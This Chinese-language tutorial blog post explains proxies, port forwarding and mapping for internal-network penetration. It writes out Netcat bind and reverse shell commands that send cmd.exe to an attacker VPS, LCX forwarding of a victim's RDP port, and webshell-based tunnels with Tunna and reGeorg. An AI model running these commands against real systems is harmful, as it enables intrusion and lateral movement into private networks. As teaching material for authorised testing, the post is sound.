内网渗透之代理、转发、映射，从零基础到精通，收藏这篇就够了！

本文链接：https://blog.youkuaiyun.com/yy17111342926/article/details/145791339

微信公众号：渊龙Sec安全团队
为国之安全而奋斗，为信息安全而发声！
如有问题或建议，请在公众号后台留言
如果你觉得本文对你有帮助，欢迎在文章底部赞赏我们

前言

在我们日常的内网渗透过程中，都需要用到代理、转发、映射。

在这篇文章中，团队成员Z师傅系统性地整理了相关笔记，希望能帮助到各位师傅的内网渗透~

何为代理

代理，也称网络代理，是一种特殊的网络服务，允许一个网络终端（一般为客户端）通过这个服务与另一个网络终端（一般为服务器）进行非直接的连接。一些网关、路由器等网络设备具备网络代理功能。一般认为代理服务有利于保障网络终端的隐私或安全，防止攻击。

在内网渗透中，利用代理工具将内网的流量代理到本地进行访问，这样就可以对内网进行下一步渗透，同时也可以利用代理工具将其他网段的流量转发到本地进行纵向渗透。

代理是一种结果，以端口转发和映射为技术基础。代理在很多场合是用在连接互联网的Web服务上面，起到突破IP封锁，隐匿身份等作用。其原理是动态的端口转发。只需要本机和代理间建立一个隧道，然后代理就可以根据本机发起的请求去动态的获取出链的地址与端口。

代理本质

代理类别：

HTTP代理
SOCKS代理
FTP代理
Telnet代理
SSL代理

Socks协议

代理的本质是Socks协议(防火墙安全会话转换协议)，工作在OSI参考模型的第5层（会话层）。使用TCP 协议传输数据，因而不提供如传递ICMP信息之类的网络层相关服务。

目前支持SOCKS4和SOCKS5两个版本：

SOCKS4支持TELNET、FTP、HTTP等TCP协议；
SOCKS5支持TCP与UDP，并支持安全认证方案。

正反向代理概述

正向代理（Forward Proxy）

是一个位于客户端和目标服务器之间的服务器(代理服务器)，为了从目标服务器取得内容，客户端向代理服务器发送一个请求并指定目标，然后代理服务器向目标服务器转交请求并将获得的内容返回给客户端。

通俗点来说：已控服务器监听端口，通过这个端口形成一个正向的隧道，由代理机器代替主机去访问内网目标。但是内网入口一般处于DMZ区域有防火墙拦截，无法直接进入内网环境。

Lhost–>proxy–>Rhost

正向代理作用：

突破访问限制：通过代理服务器，可以突破自身IP访问限制，访问国外网站，教育网等。
提高访问速度：通常代理服务器都设置一个较大的硬盘缓冲区，会将部分请求的响应保存到缓冲区中，当其他用户再访问相同的信息时，则直接由缓冲区中取出信息，传给用户，以提高访问速度。
隐藏客户端真实IP：上网者也可以通过这种方法隐藏自己的IP，免受攻击。

反向代理（Reverse Proxy）

是指以代理服务器来接受Internet上的连接请求，然后将请求转发给内部网络上的服务器，并将从服务器上得到的结果返回给Internet上请求连接的客户端，此时代理服务器对外就表现为一个反向代理服务器。

易懂点：由内网主机主动交出权限到代理机器，然后本地去连接形成反向代理。例如：VPS监听本地端口，已控内网服务器来连接此端口，形成一个隧道。如果内网设备连接外网，就无法回弹只能再想其他办法。

Lhost<—>proxy<—>firewall<—>Rhost

反向代理作用：

隐藏服务器真实IP：使用反向代理，可以对客户端隐藏服务器的IP地址。
负载均衡：反向代理服务器可以做负载均衡，根据所有真实服务器的负载情况，将客户端请求分发到不同的真实服务器上。
提高访问速度：反向代理服务器可以对于静态内容及短时间内有大量访问请求的动态内容提供缓存服务，提高访问速度。
提供安全保障：反向代理服务器可以作为应用层防火墙，为网站提供对基于Web的攻击行为（例如DoS/DDoS）的防护，更容易排查恶意软件等。还可以为后端服务器统一提供加密和SSL加速（如SSL终端代理），提供HTTP访问认证等。

透明代理

客户端不需要知道有代理服务器的存在，它会改变你的request fields，并传送真实IP，在路由器的NAT转发中比较常见，另外一些公司或学校用于控制内网对外网的访问时，也会用到透明代理。

透明代理作用：

实践例子为当下很多公司使用的行为管理软件。
客户端访问web并不知道是通过代理服务器访问的。
防火墙设置透明代理，当PC让代理服务器请求Web页面时，代理服务器返回页面数据。

正反向代理区别

正向代理服务器和反向代理服务器所处的位置都是客户端和真实服务器之间，所做的事情也都是把客户端的请求转发给服务器，再把服务器的响应转发给客户端。但两者还是有所差异：

正向代理其实是客户端的代理，帮助客户端访问其无法访问的服务器资源。反向代理则是服务器的代理，帮助服务器做负载均衡，安全防护等。
正向代理一般是客户端架设的，比如在自己的机器上安装一个代理软件。而反向代理一般是服务器架设的，比如在自己的机器集群中部署一个反向代理服务器。
正向代理中，服务器不知道真正的客户端到底是谁，以为访问自己的就是真实的客户端。而在反向代理中，客户端不知道真正的服务器是谁，以为自己访问的就是真实的服务器。
正向代理和反向代理的作用和目的不同。正向代理主要是用来解决访问限制问题。而反向代理则是提供负载均衡、安全防护等作用。二者均能提高访问速度。

端口转发、映射

端口转发

端口转发 Port Forwarding：在渗透测试后获取主机权限后下一步就是内网渗透，内网中的其他机器是不允许外网机器访问的。这时候，我们可以通过端口转发(隧道)或将这台外网服务器设置成为代理，使得我们自己的攻击机可以直接访问与操作内网中的其他机器。

即端口转发是转发一个网络端口从一个网络节点到另一个网络节点的行为，其使一个外部用户从外部经过一个被激活的NAT路由器到达一个在私有内部IP地址（局域网内部）上的一个端口。

通过系列配置和软件，访问端口 A 的流量转发到端口 B 上，端口 A 和 B 可以为本地端口，也可以为远程端口。

转发作用：

端口转发常用于网段之间的跳跃，即将搭建好的隧道端口转发出来；
大多数端口转发场景均可以使用操作系统自带网络配置软件实现，具备众多优势如软件依赖少、杀毒软件白名单、不开启新进程、稳定可靠、隐秘性强。

Windows端口转发

查看端口映射情况  
netsh interface portproxy show v4tov4  
  
添加一个端口映射  
netsh interface portproxy add v4tov4 listenport=40050  
connectaddress=192.168.1.10  
connectport=50000  
  
删除一个端口映射  
Netsh interface portproxy delete v4tov4 40050(监听端口号)

Linux端口转发

iptables -t nat -A PREROUTING -d <跳板机 IP> -p tcp --dport <跳板机端口> -j DNAT --to-destination <跳板机可访问的目标主机IP>:<目标主机端口>  
  
iptables -t nat -A POSTROUTING -d <跳板机可访问的目标主机 IP> -p tcp --dport <目标主机端口> -j SNAT --to <跳板机 IP>

端口映射

端口映射是NAT的一种，功能是把在公网的地址转翻译成私有地址，采用路由方式的ADSL宽带路由器拥有一个动态或固定的公网IP，ADSL直接接在HUB或交换机上，所有的电脑共享上网。

端口转发、映射场景

端口转发：外网主机A已经可以任意内网主机B上的端口，但是无法访问内网主机C上的端口
端口映射：外网主机A想访问内网主机B上的服务

总结：

图例一，端口转发与映射原理相似，区别在于应用场景有所不同。若将本机端口转发至远程主机端口，可称之为端口映射或者端口转发。

图例二，若把本机可以访问到的任意 IP的端口转发到另外一台服务器的端口，则称之为端口转发。

端口转发、代理工具

Netcat

NC被称为瑞士军刀，是一个相对轻量的工具即Netcat，囊括了扫描、获取反弹Shell乃至于文件传输、脚本执行等功能。
工具地址：http://netcat.sourceforge.net/

NC常用命令：

-d：后台模式  
-e：程序重定向  
-g：设置路由器跃程通信网关，最多可以设置8个  
-G：设置源路由指向器的数量，值为4的倍数  
-h：在线帮助  
-i：设置时间间隔，以便传送信息及扫描通信端口  
-l：使用监听模式，管理和控制传入的数据  
-n：直接使用IP地址（不通过域名服务器）  
-o：指定文件名称，把往来传输的数据转换为十六进制字节码后保存在该文件中  
-p：这是本地主机使用的通信端口  
-r：随机指定本地与远程主机的通信端口  
-s：设置本地主机送出的数据包的IP地址  
-u：使用UDP传输协议  
-v：详细输出  
-w：设置等待连线的时间  
-z：将输入/输出功能关闭，只在扫描通信端口是使用

NC 端口转发测试：
正向连接：可使服务器获得客户端的一个bash

服务器：nc -lp 端口 -C bash
客户端：nc -nv 服务器ip地址端口

正向连接场景：目标防火墙不阻止外来流量，绑定本地的cmdshell在服务器的端口上然后本地去连接

服务器(192.168.1.98)执行命令将cmdshell绑定在本地5555端口上  
nc -l -p 5555 -t -e cmd.exe  
  
在内网主动连接服务器的5555端口，可直接获取目标的cmdshell  
nc -nvv 192.168.1.98 5555

反向连接：可使客户端获得服务器的一个bash

服务器：nc -lp 端口
客户端：nc 服务器ip地址端口 -C bash

反向连接场景：目标设备在内网，防火墙阻止外来流量。绑定服务器的cmdshell并反向连接到VPS(192.168.1.4)的TCP端口

vps开启监听  
nc -lp 5555  
  
服务器内网链接vps 5555端口，主动返回cmdshell  
nc -t -e cmd.exe 192.168.1.4 5555

总结

如果客户端（相当于内网）连接服务器（相当于外网），想获取服务器的shell，那么称为正向shell
如果是客户端连接服务器，服务器端想获取客户端的shell，那么称为反向shell

LCX

lcx是一个端口转发工具，有Windows版和Linux版两个版本，Windows版是lcx.exe，Linux版为 portmap。

LCX功能：

端口转发（listen和slave成对使用）
端口映射（tran）

LCX常用命令：

lcx -<listen|tran|slave> <option> [-log logfile]  
[option:]  
-listen <ConnectPort> <TransmitPort>  
-tran <ConnectPort> <TransmitHost> <TransmitPort>  
-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>

LCX 端口转发测试:
1、内网主机执行命令

lcx.exe –slave <公网主机ip> <公网主机端口> <内网主机ip> <内网主机端口>  
lcx -slave 192.168.1.104 4444 127.0.0.1 3389  
  
即将内网主机的3389端口转发到具有公网ip主机的4444端口

2、公网主机执行命令

、

lcx.exe –listen <公网主机端口1> <公网主机端口2>  
lcx –listen 4444 5555  
  
即监听公网主机的 4444 端口请求，并将来自 4444 端口的请求传送给 5555 端口

3、远程桌面连接即可

RDP 连接，Windows新窗口命令行下输入mstsc，即可打开远程桌面连接
若是在公网主机上操作，则输入 127.0.0.1:5555 若是在本地主机上操作，则输入公网主机IP:5555 ，然后输入用户名和密码，即可连接到内网主机

本地端口转发:
由于防火墙限制，部分端口如3389无法通过防火墙，此时可以将该目标主机的3389端口透传到防火墙允许的其他端口（如53端口）

1、目标主机执行命令

lcx -tran 53 192.168.1.104 3389

2、连接远程桌面

reDuh

可以把内网服务器的端口通过http/https隧道转发到本机，形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。服务端是个Webshell，工具里面针对不同服务器有aspx,php,jsp三个版本，客户端是Java写的

公网主机–>客户端–>http隧道–>服务端–>内网服务器

Tunna

先决条件：能够在远程服务器上上传Webshell
工具地址：https://github.com/SECFORCE/Tunna

Tunna常用命令：

python proxy.py -u <remoteurl> -l <localport> [options]  
  
--help, -h //显示此帮助信息并退出  
--url=URL, -u URL //为远程Webshel的URL  
--lport=LOCAL_PORT, -l LOCAL_PORT //代表本地侦听端口  
--verbose, -v //详细（输出数据包大小）  
--buffer=BUFFERSIZE, -b BUFFERSIZE* //HTTP请求大小（一些网站对大小有限制）

Tunna端口转发：
1、往远程主机上传Webshell，如上传.aspx文件
2、Windows内网主机，执行命令

python proxy.py -u http://IP/test/conn.aspx -l 4444 -r 3389 -v

reGeorg

reGeory适用于公网服务器只开放了80端口的情况。
reGeorg是用 Python写的利用Web进行代理的工具，流量只通过 http 传输，也就是http隧道。reGeorg脚本的特征非常明显，很多杀软都会进行查杀。
工具地址：https://github.com/sensepost/reGeorg

reGeorg常用命令：

reGeorgSocksProxy.py [-h] [-l] [-p] [-r] -u [-v]  
用于reGeorg HTTP Tunneller的Socks服务器  
  
可选参数：  
-h，--help //显示此帮助消息并退出  
-l，--listen-on //默认的监听地址  
-p，--listen-port //默认监听端口  
-r，--read-buff //本地读取缓冲区，每个POST发送的最大数据  
-u，--url //包含隧道脚本的URL  
-v，--verbose //详细输出[INFO | DEBUG]

reGeorg端口转发：
1、将tunnel.aspx | ashx | jsp | php 上传到Web服务器
2、配置工具以使用Socks代理，使用启动reGeorgSocksProxy.py时指定的IP地址和端口。使用Socks5的工具，将代理指向127.0.0.1:8080。
3、PC端运行命令